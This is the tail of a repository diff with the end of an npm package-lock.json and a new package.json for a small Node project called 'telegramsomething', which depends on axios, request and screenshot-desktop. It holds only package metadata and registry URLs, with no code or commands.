"integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A=="
|
||||
},
|
||||
"qs": {
|
||||
"version": "6.5.2",
|
||||
"resolved": "https://registry.npmjs.org/qs/-/qs-6.5.2.tgz",
|
||||
"integrity": "sha512-N5ZAX4/LxJmF+7wN74pUD6qAh9/wnvdQcjq9TZjevvXzSUo7bfmw91saqMjzGS2xq91/odN2dW/WOl7qQHNDGA=="
|
||||
},
|
||||
"request": {
|
||||
"version": "2.88.2",
|
||||
"resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz",
|
||||
"integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==",
|
||||
"requires": {
|
||||
"aws-sign2": "~0.7.0",
|
||||
"aws4": "^1.8.0",
|
||||
"caseless": "~0.12.0",
|
||||
"combined-stream": "~1.0.6",
|
||||
"extend": "~3.0.2",
|
||||
"forever-agent": "~0.6.1",
|
||||
"form-data": "~2.3.2",
|
||||
"har-validator": "~5.1.3",
|
||||
"http-signature": "~1.2.0",
|
||||
"is-typedarray": "~1.0.0",
|
||||
"isstream": "~0.1.2",
|
||||
"json-stringify-safe": "~5.0.1",
|
||||
"mime-types": "~2.1.19",
|
||||
"oauth-sign": "~0.9.0",
|
||||
"performance-now": "^2.1.0",
|
||||
"qs": "~6.5.2",
|
||||
"safe-buffer": "^5.1.2",
|
||||
"tough-cookie": "~2.5.0",
|
||||
"tunnel-agent": "^0.6.0",
|
||||
"uuid": "^3.3.2"
|
||||
}
|
||||
},
|
||||
"rimraf": {
|
||||
"version": "2.6.3",
|
||||
"resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.6.3.tgz",
|
||||
"integrity": "sha512-mwqeW5XsA2qAejG46gYdENaxXjx9onRNCfn7L0duuP4hCuTIi/QO7PDK07KJfp1d+izWPrzEJDcSqBa0OZQriA==",
|
||||
"requires": {
|
||||
"glob": "^7.1.3"
|
||||
}
|
||||
},
|
||||
"safe-buffer": {
|
||||
"version": "5.2.1",
|
||||
"resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz",
|
||||
"integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ=="
|
||||
},
|
||||
"safer-buffer": {
|
||||
"version": "2.1.2",
|
||||
"resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz",
|
||||
"integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg=="
|
||||
},
|
||||
"screenshot-desktop": {
|
||||
"version": "1.12.1",
|
||||
"resolved": "https://registry.npmjs.org/screenshot-desktop/-/screenshot-desktop-1.12.1.tgz",
|
||||
"integrity": "sha512-yGIqX1hmNmjoyGowfODc/Cmo097A9LiTIj4PKMa/ZbaCchfhdXXXkmihgbaHtLuwGM15fSNbgFTmgB11JqHrfQ==",
|
||||
"requires": {
|
||||
"pinkie-promise": "^2.0.1",
|
||||
"temp": "^0.9.0"
|
||||
}
|
||||
},
|
||||
"sshpk": {
|
||||
"version": "1.16.1",
|
||||
"resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz",
|
||||
"integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==",
|
||||
"requires": {
|
||||
"asn1": "~0.2.3",
|
||||
"assert-plus": "^1.0.0",
|
||||
"bcrypt-pbkdf": "^1.0.0",
|
||||
"dashdash": "^1.12.0",
|
||||
"ecc-jsbn": "~0.1.1",
|
||||
"getpass": "^0.1.1",
|
||||
"jsbn": "~0.1.0",
|
||||
"safer-buffer": "^2.0.2",
|
||||
"tweetnacl": "~0.14.0"
|
||||
}
|
||||
},
|
||||
"temp": {
|
||||
"version": "0.9.1",
|
||||
"resolved": "https://registry.npmjs.org/temp/-/temp-0.9.1.tgz",
|
||||
"integrity": "sha512-WMuOgiua1xb5R56lE0eH6ivpVmg/lq2OHm4+LtT/xtEtPQ+sz6N3bBM6WZ5FvO1lO4IKIOb43qnhoc4qxP5OeA==",
|
||||
"requires": {
|
||||
"rimraf": "~2.6.2"
|
||||
}
|
||||
},
|
||||
"tough-cookie": {
|
||||
"version": "2.5.0",
|
||||
"resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz",
|
||||
"integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==",
|
||||
"requires": {
|
||||
"psl": "^1.1.28",
|
||||
"punycode": "^2.1.1"
|
||||
}
|
||||
},
|
||||
"tunnel-agent": {
|
||||
"version": "0.6.0",
|
||||
"resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz",
|
||||
"integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=",
|
||||
"requires": {
|
||||
"safe-buffer": "^5.0.1"
|
||||
}
|
||||
},
|
||||
"tweetnacl": {
|
||||
"version": "0.14.5",
|
||||
"resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz",
|
||||
"integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q="
|
||||
},
|
||||
"uri-js": {
|
||||
"version": "4.2.2",
|
||||
"resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.2.2.tgz",
|
||||
"integrity": "sha512-KY9Frmirql91X2Qgjry0Wd4Y+YTdrdZheS8TFwvkbLWf/G5KNJDCh6pKL5OZctEW4+0Baa5idK2ZQuELRwPznQ==",
|
||||
"requires": {
|
||||
"punycode": "^2.1.0"
|
||||
}
|
||||
},
|
||||
"uuid": {
|
||||
"version": "3.4.0",
|
||||
"resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz",
|
||||
"integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A=="
|
||||
},
|
||||
"verror": {
|
||||
"version": "1.10.0",
|
||||
"resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz",
|
||||
"integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=",
|
||||
"requires": {
|
||||
"assert-plus": "^1.0.0",
|
||||
"core-util-is": "1.0.2",
|
||||
"extsprintf": "^1.2.0"
|
||||
}
|
||||
},
|
||||
"wrappy": {
|
||||
"version": "1.0.2",
|
||||
"resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz",
|
||||
"integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8="
|
||||
}
|
||||
}
|
||||
}
|
17
TelegramSomething/src/package.json
Normal file
17
TelegramSomething/src/package.json
Normal file
@ -0,0 +1,17 @@
|
||||
{
|
||||
"name": "telegramsomething",
|
||||
"version": "1.0.0",
|
||||
"description": "Idk what im doing",
|
||||
"main": "main.js",
|
||||
"scripts": {
|
||||
"test": "echo \"Error: no test specified\" && exit 1"
|
||||
},
|
||||
"author": "Constantin",
|
||||
"license": "ISC",
|
||||
"dependencies": {
|
||||
"axios": "^0.19.2",
|
||||
"request": "^2.88.2",
|
||||
"screenshot-desktop": "^1.12.1"
|
||||
},
|
||||
"bin": "main.js"
|
||||
}
|
Loading…
x
Reference in New Issue
Block a user